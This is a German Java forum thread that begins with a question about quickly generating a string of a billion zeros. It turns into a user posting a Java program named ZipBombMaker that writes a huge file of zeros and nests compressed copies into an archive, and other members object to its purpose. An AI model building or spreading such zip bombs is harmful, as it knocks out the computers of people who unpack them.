Variablen String mit 1 Milliarde 0en

Lucaaa

Bekanntes Mitglied
Hallo!
Ich möchte einen String mit 1 Milliarde 0en generieren.
Habs bisher mit einer for-Schleife wo immer ein char c auf den String gerechnet wird. Hab es erst mal mit 1 Millionen 0en versucht und es dauert fast 1 Minute. das ist zu lang!!!.
Hab mal ein YouTube-Video gesehen wie das schneller geht irgendwas mit CharAt oder StringAt oder so ähnlich. Hat da vielleicht jemand eine Idee?
 

Joose

Top Contributor
Strings sind unveränderlich daher muss immer ein neues String Objekt erzeugt werden.

Anstatt einfach Strings zusammenzuhängen könntest du schon mal den StringBuilder verwenden, generell könntest du auch einfach immer meherer "0" gleichzeitig hinzufügen. Das verkürzt die Laufzeit sicher ebenfalls.

Bleibt aber die Frage bestehen warum willst du das machen? Warum muss es "schnell" sein? Es gibt andere Sprachen mit denen das sicher schneller geht -> C++
 

Enceladus271

Bekanntes Mitglied
Ich würde es so versuchen:
Java:
final char zero = '0';
final char[] charArray = new char[1000000000];
Arrays.fill(charArray, zero);
final String text = new String(charArray);

edit: geh aber mal davon aus dass du sehr viel Speicher brauchst. Der VM solltest du soviel wie möglich geben.
 

Flown

Administrator
Mitarbeiter
Ahh da hab ich was auf SO (HIER) mal gemacht. Ging um ein ähnliches Problem, aber im Grunde kann man das ja dann abwandeln:
Java:
public static String repeat(char[] arr, int newLength) {
  char[] dup = Arrays.copyOf(arr, newLength);
  for (long last = arr.length; last != 0 && last < newLength; last <<= 1) {
    System.arraycopy(dup, 0, dup, (int) last, (int) (Math.min(last << 1, newLength) - last));
  }
  return new String(dup);
}
Aufruf mit String s = repeat(new char[]{0}, 1_000_000);
 

Thallius

Top Contributor
Zum Glück gibt es Menschen, die sowas anders sehen, sonst würden wir vermutlich grad mit Faustkeilen aufeinander einprügeln ;)

Keine Ahnung was du mir damit sagen willst aber wenn jemand einen String mit 1 Million Nullen erstellen will ist das genauso als ob jemand mit dem aneinander reiben von zwei Fliegenpilzen Feuer machen will statt mit zwei Steien. absolute zeitverschwendung...
 

JStein52

Top Contributor
Vielleicht interessiert es ihn einfach wie schnell man so was machen kann. Ich habe kürzlich auch mal Pi auf 10 Mio. Stellen genau ausgerechnet.
 

Thallius

Top Contributor
Vielleicht interessiert es ihn einfach wie schnell man so was machen kann. Ich habe kürzlich auch mal Pi auf 10 Mio. Stellen genau ausgerechnet.

Ich habe mal PI auf 100 stellen genau mit dem C64 ausgerechnet. War eine echte Herausforderung das ist ja auch spannend aber einen String mit 1 Millionen Nullen? Da hätten wir damals drei Befehle gebraucht

char *buffer = alloc(1000 * 1000);
If(buffer)
memset(buffer, 1000 * 1000, 48);

Aber ein Herausforderung ist das nicht wirklich...
 
X

Xyz1

Gast
Sorry das ist der Uhrzeit geschuldet. log(10^x) ist natürlich linear (= x).

http://www.wolframalpha.com/input/?i=plot+(x-1)/log_10(2)/8+from+x=0+to+10
In 1 Byte passen 3 Ziffern.
In 3 Byte passen 8 Ziffern.
Usw.

und hier sieht man wunderbar:
http://www.wolframalpha.com/input/?i=plot+(x-1)/log_10(2)/8/1024/1024+from+x=0+to+1000000000

es sind genau:
396.0046877342980209568687774680937226266194840860067867076... MB

Sparsamer wäre man vielleicht mit der wissen. Notation: "10^1000000000", das wären maximal nur 13 * 2 Byte = 26 Byte.
 

Lucaaa

Bekanntes Mitglied
Hier meine Lösung;
Java:
 public static void main(String[] arg) throws FileNotFoundException {
    String text = "" ;
     
    StringBuilder sb = new StringBuilder();
   
    for(int i = 0; i <= 1000000000; i++) {
     sb.append('0');
   //  System.out.println(i);
    }
      text = sb.toString();
      System.out.println("fertig");
      
     
   }
 
X

Xyz1

Gast
StringBuilder sb = new StringBuilder();

for(int i = 0; i <= 1000000000; i++) {
sb.append('0');
// System.out.println(i);
}
Ist auch Okay, nicht ganz so schnell, aber um Geschwindigkeit kann es hier nicht gehen.

Kann mal ein Mathe-Prof. schauen oben, ob meine Berechnung richtig/vollst./sinnvoll iss?
 
X

Xyz1

Gast
Auch wenn es manchmal vorkommt. das ich einen OutOfMemory Fehler bekomme
Weil die VM höflich ist und idR nicht mehr als 2 GB Speicher fordert. Damit werden auch einige Programmierfehler vermieden.

Nun ist es aber so, das du eine Zeichenketten mit 1 Mrd. 0en erstellst... Dagegen ist die Zahl der Atome im Universum ja winzig.
 

Lucaaa

Bekanntes Mitglied
Weil die VM höflich ist und idR nicht mehr als 2 GB Speicher fordert. Damit werden auch einige Programmierfehler vermieden.
Und deswegen umgehen wir das Problem und generieren nur 10 Millionen und schreiben die dann hinternander weg 100 mal in eine Datei. Die ist dann 986 MB groß, die wird gezippt --> nur noch 986KB, nochmal gezippt --> 4KB. - Speicherproblem gelöst.
 

Lucaaa

Bekanntes Mitglied
Es gibt garantiert eine bessere Lösung ohne OutOfMemoryError. Wie wird denn das File geschrieben?
Hier mal der Code bis jetzt:
Java:
package de.java.luca.zipbombmaker;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.util.Scanner;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;
import javax.swing.JFileChooser;
public class ZipBombMaker {
   public static void main(String[] arg) throws FileNotFoundException {
    String text = "" ;
     
    StringBuilder sb = new StringBuilder();
    
    for(int i = 0; i <= 10000000; i++) {
     sb.append('0');
   //  System.out.println(i);
    }
      text = sb.toString();
      System.out.println("fertig");
      erstelleDatei(text);
      
   }
 
 
 
   public static void erstelleDatei(String text) throws FileNotFoundException {
  String pfad = "C:\\users\\lucad\\Desktop\\zip\\test.txt";
 
  
 
  
   FileWriter fw;
   try {
    fw = new FileWriter(pfad); 
   for(int i = 0; i<100; i++) 
    fw.write(text); 
    fw.close();
   } catch (IOException e) {
    e.printStackTrace();
   }
   
   System.out.println("Datei erstellt");
   
   
   erstelleZip();
}
   
   
   
 
 
 
 
 
   
 
 public static void erstelleZip()
    {
    
 for(int zahl = 1; zahl<=16; zahl++) { 
  byte[] buffer = new byte[1024];
     try{
      FileOutputStream fos = new FileOutputStream("C:\\users\\lucad\\Desktop\\zip\\bomb\\page"+ zahl +".zip");
      ZipOutputStream zos = new ZipOutputStream(fos);
      ZipEntry ze= new ZipEntry("test.txt");
      zos.putNextEntry(ze);
      FileInputStream in = new FileInputStream("C:\\users\\lucad\\Desktop\\zip\\test.txt");
      int len;
      while ((len = in.read(buffer)) > 0) {
       zos.write(buffer, 0, len);
      }
      in.close();
      zos.closeEntry();
      //remember close it
      zos.close();
      System.out.println("Zip erstellt");
     }catch(IOException ex){
        ex.printStackTrace();
     }
    }  packeAlles();
}
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 public static void packeAlles()
    {
    
 
  byte[] buffer = new byte[1024];
     try{
      FileOutputStream fos = new FileOutputStream("C:\\users\\lucad\\Desktop\\zip\\out.zip");
      ZipOutputStream zos = new ZipOutputStream(fos);
      ZipEntry ze= new ZipEntry("\\");
      zos.putNextEntry(ze);
      FileInputStream in = new FileInputStream("C:\\users\\lucad\\Desktop\\zip\\bomb\\");
      int len;
      while ((len = in.read(buffer)) > 0) {
       zos.write(buffer, 0, len);
      }
      in.close();
      zos.closeEntry();
      //remember close it
      zos.close();
      System.out.println("Alles fertig");
     }catch(IOException ex){
        ex.printStackTrace();
     }
    }
 
 
}
 

Thallius

Top Contributor
Irgendwie sagte ich glaube ich bereits das das niemand braucht....

Schade das es Menschen gibt die ihre Lebenszeit damit verschwenden Dinge zu erstellen die anderen Menschen schaden. Unnötig wie ein Kropf...
 

Lucaaa

Bekanntes Mitglied
Schade das es Menschen gibt die ihre Lebenszeit damit verschwenden Dinge zu erstellen die anderen Menschen schaden. Unnötig wie ein Kropf...
Genau und weil ich vor habe, jedem den PC zu sprengen frage ich einfach mal im Forum nach: "Hey leute ich will ne Bombe bauen hat jemand n Bauplan?" Erst nachdenken dan schreiben!!!
 

Thallius

Top Contributor
Genau und weil ich vor habe, jedem den PC zu sprengen frage ich einfach mal im Forum nach: "Hey leute ich will ne Bombe bauen hat jemand n Bauplan?" Erst nachdenken dan schreiben!!!

Na dann sag uns doch deinen Grund wenn wir so vollkommen falsch liegen. Aber das kannste ja auch nicht. Warum wohl (DENKE ich mir da)
 

Lucaaa

Bekanntes Mitglied
Na dann sag uns doch deinen Grund wenn wir so vollkommen falsch liegen. Aber das kannste ja auch nicht. Warum wohl (DENKE ich mir da)
Ich glaube zwar nicht das dich meine Antwort wirklich interessiert, aber ich möchte ein Programm schreiben mit dem sich Zip-B#m##n erstellen lassen. Außerdem wenn ich einfach nur vor hätte jemandem zu schaden, könnte ich mir auch eine von hand machen und mich nicht mit Java abmühen.

So und jetzt schluss damit das hier ist ein Forum für Fragen bezüglich Java.
 

Lucaaa

Bekanntes Mitglied
Anstatt euch hier gegenseitig anzugreifen könntet ihr mir auch bei meinen AES problem helfen. Siehe AES fehler im anfänger-Forum!
Vielen Dank!
 
X

Xyz1

Gast
Habe einen Hinweis bekommen... aber es scheint inzwischen alles geklärt zu sein. :rolleyes:
Nachdem der TE sein Vorhaben offenbart hat, harscht es hier ja an Kritik...
 

Flown

Administrator
Mitarbeiter
Die Intention war meiner Meinung nach die Falsche. Hätte es geheißen ich möchte versuchen, einen Hack zu reproduzieren und lokal zu testen - nur für mich -, dann hätte ich auch weiter geholfen.
Aber mit "klick und bumm" war's dann für mich aus.
 
Ähnliche Java Themen
  Titel Forum Antworten Datum
krgewb String mit Datumsangabe in Long umwandeln Java Basics - Anfänger-Themen 2
D String Groß/Kleinschreibung Ignorieren Java Basics - Anfänger-Themen 4
D Map<String, Integer> sortieren und der reinfolge nach die Glieder abfragen Java Basics - Anfänger-Themen 3
J Ähnlichen String in Liste finden Java Basics - Anfänger-Themen 6
Kartoffel_1 String transformation Java Basics - Anfänger-Themen 7
H String-Operation replace() - Zeichenkette verdoppeln Java Basics - Anfänger-Themen 2
K String analysieren Java Basics - Anfänger-Themen 27
Beowend String zu Date parsen Java Basics - Anfänger-Themen 1
Beowend String auf Satzzeichen überprüfen? Java Basics - Anfänger-Themen 6
H Liste nach String-Länge sortieren Java Basics - Anfänger-Themen 1
String in ArrayList umwandeln Java Basics - Anfänger-Themen 1
I Sass Compiler und String erhalten? Java Basics - Anfänger-Themen 7
Avalon String in Double bzw. Währung konvertieren Java Basics - Anfänger-Themen 6
T Methode akzeptiert String nicht Java Basics - Anfänger-Themen 18
F Arraylist<String>Ein Wort pro Zeile Java Basics - Anfänger-Themen 6
J Schlüsselworte Prüfen, ob ein bestimmtes, ganzes Wort in einem String enthalten ist. Java Basics - Anfänger-Themen 6
N String überprüfen Java Basics - Anfänger-Themen 3
E String zerlegen aus args Java Basics - Anfänger-Themen 1
M Long-Typ in String-Änderung führt zu keinem Ergebnis bei großer Zahl Java Basics - Anfänger-Themen 11
Ostkreuz String Exception Java Basics - Anfänger-Themen 8
W Items löschen aus String Array vom Custom Base Adapter Java Basics - Anfänger-Themen 2
MoxMorris Wie macht man String[] = String[] aus einer anderer Methode? Java Basics - Anfänger-Themen 18
J String Filter Java Basics - Anfänger-Themen 5
S String Array Buchstaben um einen gewissen Wert verschieben Java Basics - Anfänger-Themen 4
R Größter zusammenhängender Block gleicher Zeichen im String Java Basics - Anfänger-Themen 1
XWing Randomizer mit einem String Java Basics - Anfänger-Themen 2
D 2D Char Array into String Java Basics - Anfänger-Themen 2
H Cast von Float nach String klappt nicht Java Basics - Anfänger-Themen 12
I Zerlegen von String Java Basics - Anfänger-Themen 3
B Beliebiger String gegeben Suche Datum in String Java Basics - Anfänger-Themen 6
I String Java Basics - Anfänger-Themen 4
I API - zurückgegebener JSON String lesen und in Entity konvertieren Java Basics - Anfänger-Themen 2
H Zu langen String aufteilen - bequeme Methode? Java Basics - Anfänger-Themen 14
W String einer Textdatei in einzelne Stringobjekte pro Zeile aufteilen Java Basics - Anfänger-Themen 14
belana wie am besten 2D Array von String to Integer Java Basics - Anfänger-Themen 18
J Java To String Methode, Array mit For-Schleife Java Basics - Anfänger-Themen 2
M Kommandozeilenparamter als EINEN String werten Java Basics - Anfänger-Themen 5
M RandomAccessFile int und String gleichzeitig in einer Datei Java Basics - Anfänger-Themen 49
M Prüfen on eine Zahl im String enthalten ist Java Basics - Anfänger-Themen 3
Distanz zwischen zwei Zeichenfolgen in einem String bestimmen Java Basics - Anfänger-Themen 5
Substring in einem String finden Java Basics - Anfänger-Themen 13
BeginnerJava String mit vorgegebener Länge und Buchstaben erzeugen/ mit Leerstellen Java Basics - Anfänger-Themen 8
I Eindeutiger String mit maximaler Anzahl an Zeichen Java Basics - Anfänger-Themen 11
H Interface Wieso "List<String> list = new ArrayList<>[…]" Java Basics - Anfänger-Themen 4
JavaBeginner22 Integer in String umwandeln Java Basics - Anfänger-Themen 7
HolyFUT JSON String in Java Object schreiben - Anführungszeichen rauskriegen? Java Basics - Anfänger-Themen 17
Fodoboo131 RegEx- Umwandlung von String in ausführbares Objekt/ Befehl Java Basics - Anfänger-Themen 9
HolyFUT Input/Output Leerzeichen aus String entfernen - klappt nicht! Java Basics - Anfänger-Themen 13
viktor1 Methoden Methode schreiben static void readText (String filename) {...} zu WordHistogramSample.java Java Basics - Anfänger-Themen 13
ravenz Schleife mit for über String Array „zahlen“und prüfen ob Wert „a“ oder „b“ oder „c“ entspricht (mittels || ) Java Basics - Anfänger-Themen 4
G Position einer unbekannten 3-stelligen-Zahl in einem String finden Java Basics - Anfänger-Themen 15
T String Array Fehler beim Index Java Basics - Anfänger-Themen 3
H Erste Schritte Nach einer Zahl n soll n Mal der String untereinander ausgegeben werden Java Basics - Anfänger-Themen 3
X Datentypen String.equals funktioniert nicht Java Basics - Anfänger-Themen 5
Alen123 String wiederholen mit Schleifen Java Basics - Anfänger-Themen 1
A String split funktioniert nicht, wenn mehr als 1 Ziffer vor dem Zeichen steht nach dem er trennen soll? Java Basics - Anfänger-Themen 4
T String splitten Java Basics - Anfänger-Themen 3
sserio Schwimmen als Spiel. Problem mit to String/ generate a card Java Basics - Anfänger-Themen 4
J Datentypen String in File konvertieren funktioniert nicht Java Basics - Anfänger-Themen 4
T Platzhalter in String? Java Basics - Anfänger-Themen 14
M String mit Variable vergleichen Java Basics - Anfänger-Themen 9
I String Kombination erstellen anhand fortlaufender Zahl (Vertragsnummer) Java Basics - Anfänger-Themen 13
Fats Waller Compiler-Fehler Kann ich einen String und die Summe zweier Char Werte mittels der println Anweisung ausgeben Java Basics - Anfänger-Themen 4
M Wie kann eine Methode (string) eine andere Methode (void) mit zufälligen int-Werten aufrufen? Java Basics - Anfänger-Themen 4
P9cman Vokale in einem String überprüfen mittels Rekursion Java Basics - Anfänger-Themen 8
schredder Strings und reguläre Ausdrücke - Methode mit return string.matches Java Basics - Anfänger-Themen 5
R Ein Multidimensionales String Array initialisieren und Deklarieren Java Basics - Anfänger-Themen 2
H String Repräsentation eines Rechtecks mit Instanz-Methode Java Basics - Anfänger-Themen 8
Dorfschmied Kartesisches Produkt von zwei Liste mit Hashmaps<String,String> erstellen Java Basics - Anfänger-Themen 4
S String mit Int input vergleichen Java Basics - Anfänger-Themen 5
C String/Char-API Java Basics - Anfänger-Themen 13
U Char zu einem String machen Java Basics - Anfänger-Themen 1
B Anzahl Nullen uns Einsen in String ermitteln Java Basics - Anfänger-Themen 3
T Leerzeichen im String entfernen Java Basics - Anfänger-Themen 6
Jose05 Nullpointerexception bei Umwandlung von String zu int Java Basics - Anfänger-Themen 2
O Ich habe einen String und soll mit matches schauen, ob ein Buchstabe zu einer geraden ANzahl im String vorkommt, wie soll das gehen? Java Basics - Anfänger-Themen 7
M String beim einlesen formatieren Java Basics - Anfänger-Themen 12
N null in String replacen Java Basics - Anfänger-Themen 16
R Compiler-Fehler JTable mit XML befüllen | The constructor JTable(Object[], String[]) is undefined Java Basics - Anfänger-Themen 10
M Eclipse kennt keine String Klasse mehr Java Basics - Anfänger-Themen 1
M Frage zur Methode split der Klasse String Java Basics - Anfänger-Themen 32
D String mit int multiplizieren? Java Basics - Anfänger-Themen 16
H Überprüfen ob String Array leer ist Java Basics - Anfänger-Themen 4
A Korrigierte <String> Liste zurückgeben Java Basics - Anfänger-Themen 22
C In String, Buchstaben ersetzen durch andere Buchstaben Java Basics - Anfänger-Themen 26
Poppigescorn String mit mehreren Wörtern füllen? Java Basics - Anfänger-Themen 4
I String Expression mit Java validieren (true / false) Java Basics - Anfänger-Themen 34
B String - Wörter finden, welches Punkt und entsprechender Pre / Suffix hat? Java Basics - Anfänger-Themen 30
T Maximale Anzahl von Konsonanten im String Java Basics - Anfänger-Themen 6
H String verschlüsseln - eigener Algorithmus Java Basics - Anfänger-Themen 104
N Aus einem String die Anzahl der Vokale auslesen Java Basics - Anfänger-Themen 40
J Eintrag Combobox über einen String auswählen Java Basics - Anfänger-Themen 3
K mit String.splitt(",") ganzen Satz erhalten? Java Basics - Anfänger-Themen 3
K Wie String prüfen ob drei mal das gleiche Zeichen vorkommt? Java Basics - Anfänger-Themen 7
I Validation, ob String ein Wert aus einem Enum enthält Java Basics - Anfänger-Themen 3
D String und char in String speichern Java Basics - Anfänger-Themen 5
A ObservableList<String> Java Basics - Anfänger-Themen 6
I String nach Wort suchen Java Basics - Anfänger-Themen 6
I String ersetzen, der Inhalt enthält Java Basics - Anfänger-Themen 4
L ArrayList<String> --> double[] array Java Basics - Anfänger-Themen 18

Ähnliche Java Themen

Neue Themen


Oben